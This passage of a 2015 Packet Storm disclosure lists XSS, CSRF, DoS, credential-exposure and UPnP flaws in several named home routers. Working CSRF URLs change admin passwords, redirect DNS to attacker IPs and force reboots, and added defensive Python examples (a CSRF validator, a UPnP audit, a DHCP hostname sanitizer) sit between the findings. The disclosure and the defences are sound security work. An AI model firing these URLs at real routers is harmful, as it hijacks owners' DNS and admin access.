60+ Vulnerabilities In 22 SOHO Routers

2015-05-29T00:00:00
ID PACKETSTORM:132074
Type packetstorm
Reporter Ivan Sanz de Castro
Modified 2015-05-29T00:00:00

Description

                                        
                                            `Dear PacketStorm community,  
  
we are a group of security researchers doing our IT Security Master's Thesis at Universidad   
Europea de Madrid.  
  
As a part of the dissertation, we have discovered multiple vulnerabilities in the  
following SOHO routers:  
  
1. Observa Telecom AW4062  
2. Comtrend WAP-5813n  
3. Comtrend CT-5365  
4. D-Link DSL-2750B  
5. Belkin F5D7632-4  
6. Sagem LiveBox Pro 2 SP  
7. Amper Xavi 7968 and 7968+  
8. Sagem Fast 1201  
9. Linksys WRT54GL  
10. Observa Telecom RTA01N  
11. Observa Telecom Home Station BHS-RTA  
12. Observa Telecom VH4032N  
13. Huawei HG553  
14. Huawei HG556a  
15. Astoria ARV7510  
16. Amper ASL-26555  
17. Comtrend AR-5387un  
18. Netgear CG3100D  
19. Comtrend VG-8050  
20. Zyxel P 660HW-B1A  
21. Comtrend 536+  
22. D-Link DIR-600  
  
  
The aforementioned vulnerabilities are:   
- Persistent Cross Site Scripting (XSS) on #1, #2, #3, #6, #10, #12, #13, #14, #16, #17, #18, #19 and #20.  
- Unauthenticated Cross Site Scripting on #3, #7, #8, #9, #10, #14, #16, #17 and #19.  
- Cross Site Request Forgery (CSRF) on #1, #2, #3, #5, #10, #12, #13, #14, #15, #16, #18 and #20.  
- Denial of Service (DoS) on #1, #5 and #10.  
- Privilege Escalation on #1.  
- Information Disclosure on #4 and #11.  
- Backdoor on #10.  
- Bypass Authentication using SMB Symlinks on #12.  
- USB Device Bypass Authentication on #12, #13, #14 and #15.  
- Bypass Authentication on #13 and #14.  
- Universal Plug and Play related vulnerabilities on #2, #3, #4, #5, #6, #7, #10, #11, #12, #13, #14, #16, #21 and #22.  
  
  
CVEs have already been requested from MITRE and other CNAs (since MITRE is taking forever to  
assign a CVE) and we are waiting for a response. OSVDB IDs have been assigned.  
  
Vendors and manufacturers have already been notified.  
  
All routers have been physically tested.  
  
  
============================================================================================  
Manufacturer: Observa Telecom   
Model: AW4062   
Tested firmwares: 1.3.5.18 and 1.4.2 (latest)  
Comments: Common router that Spanish ISP Telefónica used to give away to their  
ADSL customers, especially during 2012.  
--------------------------------------------------------------------------------------------  
  
----------------------------- Persistent Cross Site Scripting ----------------------------  
* Description: Multiple Cross-site Scripting (XSS) vulnerabilities were found in the configuration  
menu of the router web interface.  
They give an attacker the opportunity to execute malicious  
scripts.  
* Report status: Reported to MITRE on 2015-03-12. Waiting for assignment.  
OSVDB-121211 (http://osvdb.org/show/osvdb/121211)  
  
* PoC:  
The flaw lies in input fields that accept special characters and then display the  
submitted value in the web interface itself.  
  
For example, there is a vulnerable input field within the subdirectory Domain Blocking. When used  
legitimately, this field blocks the traffic between the router and particular  
domains.  
The script remains stored (persistent XSS) in the Domain field of the Domain Block  
Table and is executed each time the victim accesses the Domain Blocking  
subdirectory.  
  
This vulnerability can also be found within the input fields that belong to other  
subdirectories such as Firewall/URL Blocking, Firewall/Port Forwarding, Services/DNS/Dynamic  
DNS and Advance/SNMP, among others.  
  
The most effective attack is found inside the Advance/SNMP subdirectory. By injecting the  
script into the System Name field, the malicious code is executed each time someone  
connects to the router, because that field is displayed on the home page.  
--------------------------------------------------------------------------------------------  
  
------------------------------- Cross Site Request Forgery -------------------------------  
* Description: Every input field is vulnerable to Cross Site Request Forgery   
(CSRF) attacks.  
* Report status: Reported to MITRE on 2015-03-12. Waiting for assignment.  
OSVDB-121210 (http://osvdb.org/show/osvdb/121210),  
OSVDB-121212 (http://osvdb.org/show/osvdb/121212) and  
OSVDB-121214 (http://osvdb.org/show/osvdb/121214)  
  
* PoC:  
For example, if an attacker wants the victim to ping a certain IP address (in order to check whether  
the victim is currently logged into the router), he sends the victim this URL:  
http://192.168.1.1/goform/formPing?pingAddr=37.252.96.88  
  
It is also possible for an attacker to change the default router password by sending the   
victim this URL:  
http://192.168.1.1/goform/formPasswordSetup?userMode=0&oldpass=1234&newpass=12345&confpass=12345&save=%22Apply%20Changes%22  
The URL above forces the user with index 0 (this is always the user named 1234)  
to change his default password from 1234 to 12345.  
  
The following URL forces the victim to change his DNS servers to those chosen by the attacker:  
http://192.168.1.1/goform/formDNS?dnsMode=dnsManual&dns1=37.252.96.88&dns2=&dns3=  
  
Any action which is available within the website can be attacked through CSRF.   
This includes opening ports, changing the DHCP and NTP servers, modifying the Wireless   
Access point, enabling WPS, etc.  
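The missing control behind every CSRF URL in this section is that a state change is accepted from a plain GET with no proof that the request came from the router's own page. The following check is an added example (not the vendor's code or the researchers'): a server-side validator of the kind the router's goform handlers would need, using the endpoint paths from the PoCs above; the csrf_token field name and the token scheme are assumptions.

```python
import hmac
import secrets
from urllib.parse import parse_qs, urlsplit

# The router's own web origin; everything else is "cross-site".
ROUTER_ORIGIN = "http://192.168.1.1"

# Endpoints that change state, taken from the PoC URLs in this advisory.
STATE_CHANGING = {
    "/goform/formPing",
    "/goform/formPasswordSetup",
    "/goform/formDNS",
    "/goform/admin/formReboot",
}


def new_session_token() -> str:
    """Random anti-CSRF token, created at login, kept server-side and
    embedded as a hidden field in every settings form (assumed scheme)."""
    return secrets.token_urlsafe(32)


def check_request(method, url, headers, body, session_token):
    """Decide whether one request to the web UI may change settings.

    Returns (allowed, reason).  A state-changing request must
      1. be a POST (a GET fired by a link or <img> tag is never enough),
      2. carry an Origin or Referer naming the router itself, and
      3. include the session's anti-CSRF token in its body.
    Header names are assumed already normalised to the spelling used here.
    """
    path = urlsplit(url).path
    if path not in STATE_CHANGING:
        return True, "read-only endpoint"
    if method.upper() != "POST":
        return False, "state change requested with GET"
    origin = urlsplit(headers.get("Origin") or headers.get("Referer", ""))
    if f"{origin.scheme}://{origin.netloc}" != ROUTER_ORIGIN:
        return False, "origin is not the router"
    token = parse_qs(body).get("csrf_token", [""])[0]
    if not token or not hmac.compare_digest(token.encode(), session_token.encode()):
        return False, "missing or wrong anti-CSRF token"
    return True, "ok"


def demo():
    """Run the advisory's password-change link and a legitimate form
    submission through the check; returns both (allowed, reason) results."""
    token = new_session_token()
    # The CSRF URL from the advisory, as a victim's browser would issue it
    # when it is opened from a page the victim did not control.
    poc_url = ("http://192.168.1.1/goform/formPasswordSetup?userMode=0&oldpass=1234"
               "&newpass=12345&confpass=12345&save=%22Apply%20Changes%22")
    forged = check_request("GET", poc_url, {"Referer": "http://evil.example/"}, "", token)
    # The same change made from the router's own settings page.
    legit = check_request(
        "POST", "http://192.168.1.1/goform/formPasswordSetup",
        {"Origin": ROUTER_ORIGIN},
        f"userMode=0&oldpass=1234&newpass=12345&confpass=12345&csrf_token={token}",
        token)
    return forged, legit


if __name__ == "__main__":
    for label, result in zip(("forged link", "legitimate form"), demo()):
        print(f"{label}: {result}")
```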
--------------------------------------------------------------------------------------------  
  
---------------------------------- Privilege Escalation ----------------------------------  
* Description: Any user without administrator rights is able to carry out a  
privilege escalation by reading the public router configuration  
file (config.xml). This file stores every router configuration  
parameter, including the credentials of all users, in plain text.  
* Report status: Reported to MITRE on 2015-03-12. Waiting for assignment.  
OSVDB-121213 (http://osvdb.org/show/osvdb/121213) and  
OSVDB-121285 (http://osvdb.org/show/osvdb/121285)  
  
* PoC:  
A user without administrator rights (e.g., the account named user) connects to the router through FTP.  
This user is able to retrieve both the /etc/passwd and config.xml files.  
The file config.xml stores every router configuration parameter in plain text,  
including the credentials of all users.  
In this way, any user is able to gain administrator privileges.  
  
This is critical because few people know there is a second account apart from the  
administrator. They therefore only change the administrator password, leaving a  
default account with default credentials (user:user) that is able to escalate privileges.  
--------------------------------------------------------------------------------------------  
  
------------------------------------ Denial of Service -----------------------------------  
* Description: An attacker is able to carry out an external Denial of Service  
attack.  
* Report status: Reported to MITRE on 2015-03-12. Waiting for assignment.  
  
* PoC:  
It is possible for an attacker to carry out a Denial of Service attack through CSRF:  
http://192.168.1.1/goform/admin/formReboot  
If a victim opens this URL, the router saves its configuration and reboots, a process  
that takes 60 seconds.  
  
There are tons of ways for an attacker to carry out a Denial of Service attack by exploiting  
Cross Site Request Forgery vulnerabilities:  
a) Establish new firewall rules in order to block certain URLs, IPs or MACs. Even a global  
Deny rule is possible, allowing traffic only from/to certain IPs/MACs.  
b) Delete the router configuration that allows it to connect to the Internet Service  
Provider.  
c) Disable the Wireless Interface so no device can connect through the 802.11 protocol.  
d) Etc.  
============================================================================================  
  
  
============================================================================================  
Manufacturer: Comtrend  
Model: WAP-5813n (tested on Product Numbers 723306-104 and 723306-033)  
Tested firmwares: P401-402TLF-C02_R35 and P401-402TLF-C04_R09 (latest one)  
Comments: Common router that Spanish ISP Telefónica used to give away to  
their FTTH customers from 2011 to 2014.  
--------------------------------------------------------------------------------------------  
  
----------------------------- Persistent Cross Site Scripting ----------------------------  
* Description: Some input fields within the router website are vulnerable to   
Cross-site Scripting (XSS) attacks, allowing an attacker to execute   
malicious code.   
* Report status: Reported to MITRE on 2015-03-12. Waiting for assignment.  
OSVDB-121218 (http://osvdb.org/show/osvdb/121218)  
  
* PoC:  
Although most of the input fields do not accept special characters,  
there are still some in which an XSS can be performed.  
  
For example, the SSID field within the Wireless>Basic subdirectory allows script code injection.  
The script execution can be clearly seen within the   
Wireless>Security and Wireless>MAC Filter subdirectories.  
  
--------------------------------------------------------------------------------------------  
  
------------------------------- Cross Site Request Forgery -------------------------------  
* Description: Multiple Cross Site Request Forgery (CSRF) vulnerabilities within   
the router website allow an external attacker to carry out actions   
such as changing the administrator password.  
* Report status: Reported to MITRE on 2015-03-12. Waiting for assignment.  
OSVDB-121216 (http://osvdb.org/show/osvdb/121216) and  
OSVDB-121217 (http://osvdb.org/show/osvdb/121217)  
  
* PoC:  
Every input field is vulnerable to CSRF.  
Whenever the administrator user changes his password, he is actually opening the URL:   
/password.cgi?adminPassword=newpassword.  
  
An attacker may send the following URL to the victim, so the administrator password will   
be changed to 1234567890:  
http://192.168.1.1/password.cgi?adminPassword=1234567890  
  
If an attacker wants to change the DNS servers, he may use the following URL to do so once   
the victim opens the link:   
http://192.168.1.1/dnscfg.cgi?dnsPrimary=37.252.96.88&dnsSecondary=37.252.96.89&dnsIfc=&dnsRefresh=1  
  
--------------------------------------------------------------------------------------------  
  
-------------------------------- Universal Plug and Play ---------------------------------  
* Description: An unauthenticated attacker is able to modify firewall rules and   
carry out a persistent denial of service by using the supported   
Universal Plug and Play protocol.  
* Report status: Reported to MITRE on 2015-05-21. Waiting for assignment.  
OSVDB-122383 (http://osvdb.org/show/osvdb/122383)  
  
* PoC:  
The Universal Plug and Play (UPnP) protocol is supported by the device. This protocol has   
lots of weaknesses, such as the lack of an authentication process, which can be exploited   
by attackers.  
  
The device supports multiple UPnP actions, such as changing the firewall rules   
(AddPortMapping) or the termination of any WAN connections (ForceTermination).  
  
These actions allow an attacker to carry out a persistent denial of service (the router needs  
to be factory reset to work properly again) or open critical ports, even for remote hosts  
that are not in the LAN.  
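The UPnP sections for this and the other routers below all rest on the same fact: AddPortMapping is accepted from any LAN host without authentication. As an added example (not the researchers' or a vendor's code), the following Python reads back an IGD's port-mapping table as returned by GetGenericPortMappingEntry and flags the mappings an owner should question: internal clients outside the LAN, mappings aimed at the router itself, and sensitive ports; the SOAP replies, LAN prefix and port list are constructed assumptions.

```python
import ipaddress
import xml.etree.ElementTree as ET
from dataclasses import dataclass

LAN = ipaddress.ip_network("192.168.1.0/24")   # assumed LAN prefix of the router
ROUTER_IP = ipaddress.ip_address("192.168.1.1")
# Ports whose exposure to the WAN an owner almost never intends (assumed list).
SENSITIVE_PORTS = {21, 22, 23, 80, 443, 445, 8080}
RESPONSE_TAG = "GetGenericPortMappingEntryResponse"


@dataclass
class Mapping:
    remote_host: str
    external_port: int
    protocol: str
    internal_port: int
    internal_client: str
    enabled: bool
    description: str


def parse_mapping(xml_text: str) -> Mapping:
    """Extract one mapping from a GetGenericPortMappingEntry SOAP reply
    (WANIPConnection argument names as defined in the IGD specification)."""
    root = ET.fromstring(xml_text)
    resp = next(el for el in root.iter() if el.tag.endswith(RESPONSE_TAG))

    def arg(name):
        return (resp.findtext(name) or "").strip()

    return Mapping(
        remote_host=arg("NewRemoteHost"),
        external_port=int(arg("NewExternalPort")),
        protocol=arg("NewProtocol"),
        internal_port=int(arg("NewInternalPort")),
        internal_client=arg("NewInternalClient"),
        enabled=arg("NewEnabled") == "1",
        description=arg("NewPortMappingDescription"),
    )


def audit_mapping(m: Mapping) -> list:
    """Return the reasons a mapping deserves the owner's attention; an
    empty list means it looks like an ordinary LAN-client mapping."""
    findings = []
    try:
        client = ipaddress.ip_address(m.internal_client)
    except ValueError:
        return [f"unparseable internal client {m.internal_client!r}"]
    if client not in LAN:
        findings.append(f"internal client {client} is outside the LAN")
    if client == ROUTER_IP:
        findings.append("mapping points at the router itself (management exposure)")
    if m.external_port in SENSITIVE_PORTS or m.internal_port in SENSITIVE_PORTS:
        findings.append(f"sensitive port exposed: {m.external_port}->{m.internal_port}/{m.protocol}")
    return findings


def soap_reply(remote, ext_port, proto, int_port, client, desc):
    """Constructed GetGenericPortMappingEntry reply for the demo (not a capture)."""
    return (
        '<s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/"><s:Body>'
        f'<u:{RESPONSE_TAG} xmlns:u="urn:schemas-upnp-org:service:WANIPConnection:1">'
        f'<NewRemoteHost>{remote}</NewRemoteHost>'
        f'<NewExternalPort>{ext_port}</NewExternalPort>'
        f'<NewProtocol>{proto}</NewProtocol>'
        f'<NewInternalPort>{int_port}</NewInternalPort>'
        f'<NewInternalClient>{client}</NewInternalClient>'
        '<NewEnabled>1</NewEnabled>'
        f'<NewPortMappingDescription>{desc}</NewPortMappingDescription>'
        '<NewLeaseDuration>0</NewLeaseDuration>'
        f'</u:{RESPONSE_TAG}></s:Body></s:Envelope>'
    )


# Three constructed table entries, as an audit would read them back from the IGD.
SAMPLE_REPLIES = [
    soap_reply("", 3074, "UDP", 3074, "192.168.1.20", "game console"),
    soap_reply("", 8080, "TCP", 80, "192.168.1.1", "remote admin"),
    soap_reply("", 2222, "TCP", 22, "203.0.113.5", "unknown"),
]


def audit_all(replies) -> dict:
    """Map each mapping's description to its list of findings."""
    return {m.description: audit_mapping(m) for m in map(parse_mapping, replies)}


if __name__ == "__main__":
    for desc, findings in audit_all(SAMPLE_REPLIES).items():
        print(desc, "->", findings or ["ok"])
```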
============================================================================================  
  
  
============================================================================================  
Manufacturer: Comtrend  
Model: CT-5365  
Tested firmwares: A111-306TKF-C02_R16  
Comments: Common router that Spanish ISP Telefónica used to give away to  
their FTTH customers since 2012.  
--------------------------------------------------------------------------------------------  
  
----------------------------- Persistent Cross Site Scripting ----------------------------  
* Description: Some input fields within the router website are vulnerable to   
Cross-site Scripting (XSS) attacks, allowing an attacker to execute   
malicious code.   
* Report status: Reported to MITRE on 2015-03-12. Waiting for assignment.  
OSVDB-121218 (http://osvdb.org/show/osvdb/121218)  
  
* PoC:  
Although most of the input fields do not accept special characters,  
there are still some in which an XSS can be performed.  
  
For example, the SSID field within the Wireless>Basic subdirectory allows script code injection.  
The script execution can be clearly seen within the   
Wireless>Security and Wireless>MAC Filter subdirectories.  
  
--------------------------------------------------------------------------------------------  
  
------------------------------- Cross Site Request Forgery -------------------------------  
* Description: Multiple Cross Site Request Forgery (CSRF) vulnerabilities within   
the router website allow an external attacker to carry out actions   
such as changing the administrator password.  
* Report status: Reported to MITRE on 2015-03-12. Waiting for assignment.  
OSVDB-121216 (http://osvdb.org/show/osvdb/121216) and  
OSVDB-121217 (http://osvdb.org/show/osvdb/121217)  
  
* PoC:  
Every input field is vulnerable to CSRF.  
Whenever the administrator user changes his password, he is actually opening the URL:   
/password.cgi?sysPassword=newpassword.  
An attacker may send the following URL to the victim, so the administrator password will be   
changed to 1234567890:  
http://192.168.1.1/password.cgi?sysPassword=1234567890  
  
If an attacker wants to change the DNS servers, he may use the following URL to do so once   
the victim opens the link:   
http://192.168.1.1/dnscfg.cgi?dnsPrimary=37.56.61.35.88&dnsSecondary=80.58.61.34&dnsDinamic=0&dnsRefresh=1  
  
--------------------------------------------------------------------------------------------  
  
-------------------------- Unauthenticated Cross Site Scripting --------------------------  
* Description: Unauthenticated Cross-site Scripting (XSS) allows an attacker to   
inject malicious code within the router configuration website by   
sending a DHCP Request PDU.  
* Report status: Reported to MITRE on 2015-04-15. Waiting for assignment.  
OSVDB-121215 (http://osvdb.org/show/osvdb/121215)  
  
* PoC:  
  
An external attacker is able to inject malicious code within the router website without   
requiring any login process.  
This is achieved by sending a DHCP Request PDU containing the malicious script within the   
hostname parameter.  
  
The malicious code is stored in the hostname field of the Connected Clients  
list (Device Info -> DHCP).  
Once the victim views this list, the script is executed.  
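The root cause here, and in the identical DHCP hostname findings for the other routers below, is that option 12 of a DHCP message is copied straight into the Connected Clients page. As an added example (not code from the advisory or from any vendor), this Python parses a DHCP option area, validates the host name against RFC 1123 and HTML-escapes every table cell before rendering; the packet bytes are constructed for the demo.

```python
import html
import re

DHCP_MAGIC = b"\x63\x82\x53\x63"   # magic cookie that precedes the option area
OPT_PAD, OPT_MSG_TYPE, OPT_HOSTNAME, OPT_END = 0, 53, 12, 255

# RFC 1123 host name: labels of letters, digits and hyphens (1-63 chars,
# no leading or trailing hyphen), joined by dots, at most 253 chars overall.
_LABEL = r"[A-Za-z0-9](?:[A-Za-z0-9-]{0,61}[A-Za-z0-9])?"
HOSTNAME_RE = re.compile(rf"{_LABEL}(?:\.{_LABEL})*")
PLACEHOLDER = "(invalid hostname)"


def parse_dhcp_options(options: bytes) -> dict:
    """Parse the TLV option area of a DHCP message into {code: raw value}.
    Truncated options raise instead of being silently accepted."""
    if not options.startswith(DHCP_MAGIC):
        raise ValueError("missing DHCP magic cookie")
    parsed, i = {}, len(DHCP_MAGIC)
    while i < len(options):
        code = options[i]
        if code == OPT_END:
            break
        if code == OPT_PAD:
            i += 1
            continue
        if i + 1 >= len(options):
            raise ValueError("truncated option header")
        length = options[i + 1]
        value = options[i + 2:i + 2 + length]
        if len(value) != length:
            raise ValueError("truncated option value")
        parsed[code] = value
        i += 2 + length
    return parsed


def sanitize_hostname(raw: bytes) -> tuple:
    """Return (name_to_display, accepted). Anything that is not a plain
    RFC 1123 host name is replaced by a fixed placeholder, so markup or
    control characters sent as option 12 never reach the page."""
    try:
        name = raw.decode("ascii")
    except UnicodeDecodeError:
        return PLACEHOLDER, False
    if len(name) > 253 or not HOSTNAME_RE.fullmatch(name):
        return PLACEHOLDER, False
    return name, True


def render_lease_row(mac: str, ip: str, options: bytes) -> str:
    """Build one row of the 'Connected Clients' table from a client's DHCP
    option area. Every cell is HTML-escaped; html.escape alone would already
    stop the injection, the host-name validation is defence in depth."""
    hostname_opt = parse_dhcp_options(options).get(OPT_HOSTNAME, b"")
    name, _ = sanitize_hostname(hostname_opt)
    cells = (html.escape(mac), html.escape(ip), html.escape(name))
    return "<tr>" + "".join(f"<td>{cell}</td>" for cell in cells) + "</tr>"


def build_request_options(hostname: bytes) -> bytes:
    """Constructed DHCPREQUEST option area (not captured traffic): message
    type 3 followed by option 12 carrying the given host name."""
    return (DHCP_MAGIC + bytes([OPT_MSG_TYPE, 1, 3])
            + bytes([OPT_HOSTNAME, len(hostname)]) + hostname + bytes([OPT_END]))


if __name__ == "__main__":
    # A normal client and one whose host name carries markup instead of a name.
    for name in (b"laptop-01", b"<b>not a host name</b>"):
        print(render_lease_row("00:11:22:33:44:55", "192.168.1.10",
                               build_request_options(name)))
```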
  
--------------------------------------------------------------------------------------------  
  
-------------------------------- Universal Plug and Play ---------------------------------  
* Description: An unauthenticated attacker is able to modify firewall rules and   
carry out a persistent denial of service by using the supported   
Universal Plug and Play protocol.  
* Report status: Reported to MITRE on 2015-05-21. Waiting for assignment.  
OSVDB-122383 (http://osvdb.org/show/osvdb/122383)  
  
* PoC:  
The Universal Plug and Play (UPnP) protocol is supported by the device. This protocol has   
lots of weaknesses, such as the lack of an authentication process, which can be exploited   
by attackers.  
  
The device supports multiple UPnP actions, such as changing the firewall rules   
(AddPortMapping) or the termination of any WAN connections (ForceTermination).  
  
These actions allow an attacker to carry out a persistent denial of service (the router needs  
to be factory reset to work properly again) or open critical ports, even for remote hosts  
that are not in the LAN.  
============================================================================================  
  
  
============================================================================================  
Manufacturer: D-Link  
Model: DSL-2750B  
Tested firmwares: EU_1.01  
Comments:   
--------------------------------------------------------------------------------------------  
  
------------------ Information Disclosure (Insecure Object References) -------------------   
* Description: An attacker is able to obtain critical information without being   
logged in.  
* Report status: Reported to MITRE on 2015-03-25. Waiting for assignment.  
OSVDB-121219 (http://osvdb.org/show/osvdb/121219)  
  
* PoC:  
By accessing the URL http://192.168.1.1/hidden_info.html, the browser shows a huge number of  
parameters such as the SSID, Wi-Fi password, PIN code, etc. without requiring any login.  
  
--------------------------------------------------------------------------------------------  
  
-------------------------------- Universal Plug and Play ---------------------------------  
* Description: An unauthenticated attacker is able to modify firewall rules and   
carry out a persistent denial of service by using the supported   
Universal Plug and Play protocol.  
* Report status: Reported to MITRE on 2015-05-21. Waiting for assignment.  
OSVDB-122384 (http://osvdb.org/show/osvdb/122384)  
  
* PoC:  
The Universal Plug and Play (UPnP) protocol is enabled by default on the device. This   
protocol has lots of weaknesses, such as the lack of an authentication process, which can   
be exploited by attackers.  
  
The device supports multiple UPnP actions, such as changing the firewall rules   
(AddPortMapping) or the termination of any WAN connections (ForceTermination).  
  
These actions allow an attacker to carry out a persistent denial of service (the router needs  
to be factory reset to work properly again) or open critical ports, even for remote hosts  
that are not in the LAN.  
============================================================================================  
  
  
============================================================================================  
Manufacturer: Belkin  
Model: F5D7632-4  
Tested firmwares: 6.01.04  
Comments:   
--------------------------------------------------------------------------------------------  
  
------------------------------- Cross Site Request Forgery -------------------------------  
* Description: Multiple Cross Site Request Forgery (CSRF) vulnerabilities within   
the router website allow an external attacker to carry out   
malicious actions.   
* Report status: Reported to CERT on 2015-04-14. Reported to MITRE on 2015-04-15.  
Waiting for assignment.  
OSVDB-121220 (http://osvdb.org/show/osvdb/121220)  
  
* PoC:  
Every input field is vulnerable to CSRF.  
For example, if an attacker wants to change the DNS servers, he may use the following URL to do so:  
http://192.168.2.1/cgi-bin/setup_dns.exe?page="setup_dns"&logout=""&dns1_1=37&dns1_2=252&dns1_3=96&dns1_4=88&dns2_1=37&dns2_2=252&dns2_3=96&dns2_4=89  
  
--------------------------------------------------------------------------------------------  
  
------------------------------------ Denial of Service -----------------------------------  
* Description: An attacker is able to carry out an external Denial of Service   
attack.  
* Report status: Reported to CERT on 2015-04-14. Reported to MITRE on 2015-04-15.  
Waiting for assignment.  
  
* PoC:  
It is possible for an attacker to carry out a Denial of Service attack through CSRF:  
http://192.168.2.1/cgi-bin/restart.exe?page="tools_gateway"&logout=""  
This URL causes the router to reboot, interrupting any active connection and denying the   
service for about 20 seconds.  
  
--------------------------------------------------------------------------------------------  
  
-------------------------------- Universal Plug and Play ---------------------------------  
* Description: An unauthenticated attacker is able to modify firewall rules and   
carry out a persistent denial of service by using the supported   
Universal Plug and Play protocol.  
* Report status: Reported to MITRE on 2015-05-21. Waiting for assignment.  
OSVDB-122389 (http://osvdb.org/show/osvdb/122389)  
  
* PoC:  
The Universal Plug and Play (UPnP) protocol is supported by the device. This protocol has   
lots of weaknesses, such as the lack of an authentication process, which can be exploited   
by attackers.  
  
The device supports multiple UPnP actions, such as changing the firewall rules   
(AddPortMapping) or the termination of any WAN connections (ForceTermination).  
  
These actions allow an attacker to carry out a persistent denial of service (the router needs  
to be factory reset to work properly again) or open critical ports, even for remote hosts  
that are not in the LAN.  
============================================================================================  
  
  
============================================================================================  
Manufacturer: Sagem  
Model: LiveBox 2 Pro  
Tested firmwares: FAST3yyy_671288  
Comments: Common router that ISP Orange used to give away to their ADSL   
customers.  
--------------------------------------------------------------------------------------------  
  
----------------------------- Persistent Cross Site Scripting ----------------------------  
* Description: Some input fields within the router website are vulnerable to   
Cross-site Scripting (XSS) attacks, allowing an attacker to execute   
malicious code, even if the victim is not logged into the router   
web-config page.   
* Report status: Reported to CERT on 2015-04-14. Reported to MITRE on 2015-04-15.  
Waiting for assignment.  
OSVDB-121223 (http://osvdb.org/show/osvdb/121223)   
  
* PoC:  
Although most of the input fields do not accept special characters,  
there are still some in which an XSS can be performed.  
  
1. The SSID field within the “Configuración-> Equipos -> Personalizar”   
(Configuration->Devices->Personalize) subdirectory allows script code injection.  
The script execution can be clearly seen within the “Configuración-> Equipos -> Mostrar”  
(Configuration->Devices->Show) subdirectory.  
  
2. The SSID field within the “Configuración-> LiveBox-> Configuracion Wifi -> SSID-name”   
(Configuration->LiveBox->Wi-Fi Configuration->SSID-Name) subdirectory allows script   
code injection.  
The script execution can be clearly seen within the main log-in webpage, even if the   
user is not logged in.  
  
--------------------------------------------------------------------------------------------  
  
-------------------------------- Universal Plug and Play ---------------------------------  
* Description: An unauthenticated attacker is able to modify firewall rules and   
carry out a persistent denial of service by using the supported   
Universal Plug and Play protocol.  
* Report status: Reported to MITRE on 2015-05-21. Waiting for assignment.  
OSVDB-122387 (http://osvdb.org/show/osvdb/122387)  
  
* PoC:  
The Universal Plug and Play (UPnP) protocol is enabled by default on the device. This   
protocol has lots of weaknesses, such as the lack of an authentication process, which can   
be exploited by attackers.  
  
The device supports multiple UPnP actions, such as changing the firewall rules   
(AddPortMapping) or the termination of any WAN connections (ForceTermination).  
  
These actions allow an attacker to carry out a persistent denial of service (the router needs  
to be factory reset to work properly again) or open critical ports, even for remote hosts  
that are not in the LAN.  
============================================================================================  
  
  
============================================================================================  
Manufacturer: Amper  
Model: Xavi 7968 and Xavi 7968+  
Tested firmwares: 3.01APT94 (latest one)  
Comments: Common router that ISP Telefónica used to give away to their ADSL   
customers from 2010 to 2013.  
--------------------------------------------------------------------------------------------  
  
-------------------------- Unauthenticated Cross Site Scripting --------------------------  
* Description: Unauthenticated Cross-site Scripting (XSS) allows an attacker to   
inject malicious code within the router configuration website by   
sending a DHCP Request PDU.  
* Report status: Reported to MITRE on 2015-04-15. Waiting for assignment.  
OSVDB-121224 (http://osvdb.org/show/osvdb/121224)   
  
* PoC:  
An external attacker is able to inject malicious code within the router website without   
requiring any login process.  
This is achieved by sending a DHCP Request PDU containing the malicious script within the   
hostname parameter.  
  
The malicious code is stored in the hostname field of the Connected Clients  
list (/webconfig/status/dhcp_table.html).  
Once the victim views this list, the script is executed.  
  
--------------------------------------------------------------------------------------------  
  
-------------------------------- Universal Plug and Play ---------------------------------  
* Description: An unauthenticated attacker is able to modify the WPS configuration   
by using the supported Universal Plug and Play protocol.  
* Report status: Reported to MITRE on 2015-05-21. Waiting for assignment.  
OSVDB-122388 (http://osvdb.org/show/osvdb/122388)  
  
* PoC:  
The Universal Plug and Play (UPnP) protocol is enabled by default on the device. This   
protocol has lots of weaknesses, such as the lack of an authentication process, which can   
be exploited by attackers.  
  
The device supports multiple UPnP actions, such as changing the WPS configuration or   
resetting the AP to default settings.  
============================================================================================  
  
  
============================================================================================  
Manufacturer: Sagem  
Model: Fast 1201  
Tested firmwares: 3.01APT94 (latest one)  
Comments: -  
--------------------------------------------------------------------------------------------  
  
-------------------------- Unauthenticated Cross Site Scripting --------------------------  
* Description: Unauthenticated Cross-site Scripting (XSS) allows an attacker to   
inject malicious code within the router configuration website by   
sending a DHCP Request PDU.  
* Report status: Reported to MITRE on 2015-04-15. Waiting for assignment.  
OSVDB-121222 (http://osvdb.org/show/osvdb/121222)   
  
* PoC:  
An external attacker is able to inject malicious code within the router website without   
requiring any login process.  
This is achieved by sending a DHCP Request PDU containing the malicious script within the   
hostname parameter.  
  
The malicious code is stored in the hostname field of the DHCP Leases  
list (dhcpinfo.html).  
Once the victim views this list, the script is executed.  
============================================================================================  
  
  
============================================================================================  
Manufacturer: Linksys  
Model: WRT54GL  
Tested firmwares: 4.30.16 build 6  
Comments: -  
--------------------------------------------------------------------------------------------  
  
-------------------------- Unauthenticated Cross Site Scripting --------------------------  
* Description: Unauthenticated Cross-site Scripting (XSS) allows an attacker to   
inject malicious code within the router configuration website by   
sending a DHCP Request PDU.  
* Report status: Reported to MITRE on 2015-04-15. Waiting for assignment.  
OSVDB-121221 (http://osvdb.org/show/osvdb/121221)  
  
* PoC:  
  
An external attacker is able to inject malicious code within the router website without   
requiring any login process.  
This is achieved by sending a DHCP Request PDU containing the malicious script within the   
hostname parameter.  
  
The malicious code is stored in the hostname field of the Connected Clients  
list (DHCPTable.asp). It can be accessed either directly through the URL or through the  
Status-> Local Network -> DHCP Clients Table subdirectories.  
Once the victim views this list, the script is executed.  
============================================================================================  
  
  
============================================================================================  
Manufacturer: Observa Telecom  
Model: RTA01N  
Tested firmwares: RTK_V2.2.13  
Comments: Common router that Spanish ISP Telefónica used to give away to their  
ADSL/VDSL customers.  
--------------------------------------------------------------------------------------------  
  
----------------------------- Persistent Cross Site Scripting ----------------------------  
* Description: Multiple Cross-site Scripting (XSS) vulnerabilities were found in the configuration  
menu of the router web interface. They give an attacker the  
opportunity to execute malicious scripts.  
* Report status: Reported to MITRE on 2015-05-07. Waiting for assignment.  
OSVDB-121787 (http://osvdb.org/show/osvdb/121787) and  
OSVDB-121788 (http://osvdb.org/show/osvdb/121788)  
  
* PoC:  
The flaw lies in input fields that accept special characters and then display the  
submitted value in the web interface itself.  
  
For example, the Nombre del host (Hostname) input field within the subdirectory Servicio -> DDNS  
(Service -> DDNS or /ddns.htm) is vulnerable.  
There is another vulnerable input field within the Mantenimiento -> Contraseña  
(Maintenance -> Password or /userconfig.htm) subdirectory.  
After creating a user whose username contains the malicious script, it is stored in the  
User Accounts table and executed once the victim accesses this subdirectory.  
  
--------------------------------------------------------------------------------------------  
  
